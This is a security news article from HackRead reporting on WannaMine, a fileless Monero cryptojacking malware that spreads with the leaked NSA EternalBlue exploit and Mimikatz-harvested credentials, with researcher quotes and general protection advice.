• Hacking News
    • Leaks
    • WikiLeaks
    • Anonymous
  • Tech
    • Android
    • Apple News
    • BlackBerry
    • Google News
    • Microsoft
    • Motorola
    • Nokia
    • Samsung
    • 3D
  • Cyber Crime
    • Phishing Scam
  • How To
  • Cyber Events
    • Censorship
    • Cyber Attacks
  • Security
    • Malware
  • Surveillance
    • Drones
    • NSA
    • Privacy
  • Explore
    • Gaming
    • Science
    • Viral
HackRead
  • April 23rd, 2021
  • Home
  • Advertise
  • Privacy Policy
  • Contact Us
HackRead
  • Hacking News
    • Leaks
    • WikiLeaks
    • Anonymous
  • Tech
    • Android
    • Apple News
    • BlackBerry
    • Google News
    • Microsoft
    • Motorola
    • Nokia
    • Samsung
    • 3D
  • Cyber Crime
    • Phishing Scam
  • How To
  • Cyber Events
    • Censorship
    • Cyber Attacks
  • Security
    • Malware
  • Surveillance
    • Drones
    • NSA
    • Privacy
  • Explore
    • Gaming
    • Science
    • Viral
  • Follow us
    • Facebook
    • Twitter
    • Linkedin
    • Youtube
Home
Surveillance
NSA

Fileless WannaMine Cryptojacking Malware Using NSA Exploit

February 2nd, 2018 Waqas Security, Malware, NSA 0 comments
Fileless WannaMine Cryptojacking Malware Using NSA Exploit
Share on FacebookShare on Twitter

Forget WannaCry and welcome WannaMine, a fileless cryptojacking malware using leaked NSA exploit called EternalBlue.

We cannot ignore the fact that cryptocurrencies are much in demand and monetary worth of digital currencies like Bitcoin, Ethereum, Litecoin, and Monero have soared tremendously, thereby, increasing the purchasing power and liquidity of cryptocurrency wallets.

In such a time, cybercriminals were expected to make use of the utterly profitable nature of cryptocurrencies and to do this, they have come up with an extremely productive process known as mining. Through cryptocurrency mining, they can drain energies from even the most powerful computer systems.

More: New Monero mining malware infected 500K PCs by using 2 NSA exploits

Whats more disturbing is that now cybercriminals have come up with cryptojacking malware that is solely created to suck the CPU power from computers. One such cryptojacking malware is WannaMine. It uses leaked hacking tools of the NSA (National Security Agency) to gain access to computers and drain off processor power to carry out mining.

Here, we must recall the NSA’s Windows exploit known as EternalBlue that was leaked in April 2017 by hacking group Shadow Brokers and was later used to launch the disastrous WannaCry ransomware that caused havoc worldwide and locked down NHS systems. WannaCry ransomware managed to infect around 230,000 computers in nearly 150 countries only to pave the way for another highly dangerous ransomware NotPetya. The same exploit is being used again to carry out Bitcoin and Monero mining using cryptojacking malware WanaMine.

WannaMine was identified by cybersecurity firm Panda in October 2017 while the malware was mining Monero after hijacking CPU cycles on the targeted computer. Another cybersecurity firm CrowdStrike stated that they have observed an increment in the distribution rate of WannaMine malware as infections caused by this malicious software have doubled in last few months. In fact, it crippled the operations of various companies for days and weeks and used the resources of their CPUs for Monero mining.

WannaMine is a fileless malware that utilizes advanced tactics and techniques to “maintain persistence within a network and move laterally from system to system. WannaMine uses credentials acquired with the credential harvester Mimikatz to attempt to propagate and move laterally with legitimate credentials.” wrote CrowdStrike security researchers.

Hackers are using a wide range of techniques to infect computers from email phishing attacks to remote access hack. Using Mimikatz means that the machines patched against the notorious EternalBlue exploit previously won’t be able to tolerate this malware too. “If unsuccessful, WannaMine attempts to exploit the remote system with the EternalBlue exploit,” read the blog post by CrowdStrike researchers.

WannaMine uses built-in Windows components like Windows Management Instrumentation (WMI) and PowerShell to perform its malicious tasks. Since it is a fileless malware, hence, it becomes quite difficult to detect it or stop it from harming the computers. Although it isn’t the first ever fileless malware it is indeed quite sophisticated in comparison to other malware like Adyllkuzz that require downloading of an application called CPUMiner to operate.

It is worth noting that WannaMine malware isn’t as dangerous as NotPetya or WannaCry were because it does not lock the computers but it does drain off 100% of the IT environment capability of a client by excessively using the CPUs, which is concerning for firms running data centers or server farms.

While for individual users it would mean that their PCs or laptops’ performance will deteriorate considerably. To protect your computers, it is important to enhance anti-virus security and install cybersecurity tools to ensure endpoint protection and mitigate WannaMine threat.

  • Tags
  • Cryptocurrency
  • Cryptojacking
  • Fileless
  • internet
  • Malware
  • Monero
  • NotPetya
  • NSA
  • Privacy
  • security
  • WannaCry
  • WannaMine
Facebook Twitter LinkedIn Pinterest
Previous article New Monero mining malware infected 500K PCs by using 2 NSA exploits
Next article 139 Malware Samples Identified that Exploit Meltdown & Spectre Flaws
Waqas

Waqas

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Related Posts
Hacked Android phones mimicked connected TV products for fake ad views

Hacked Android phones mimicked connected TV products for fake ad views

Signal CEO hacks Cellebrite cellphone hacking, cracking tool

Signal CEO hacks Cellebrite cellphone hacking, cracking tool

Play Store apps plagued with malware have 700,000 downloads

Play Store apps plagued with malware have 700,000 downloads

Newsletter

Get the best stories straight into your inbox!



Don’t worry, we don’t spam

Latest Posts
Hacked Android phones mimicked connected TV products for fake ad views
Cyber Crime

Hacked Android phones mimicked connected TV products for fake ad views

Signal CEO hacks Cellebrite cellphone hacking, cracking tool
Hacking News

Signal CEO hacks Cellebrite cellphone hacking, cracking tool

Play Store apps plagued with malware have 700,000 downloads
Security

Play Store apps plagued with malware have 700,000 downloads

HACKREAD is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance and Hacking News with full-scale reviews on Social Media Platforms & Technology trends. Founded in 2011, HackRead is based in the United Kingdom.

Follow us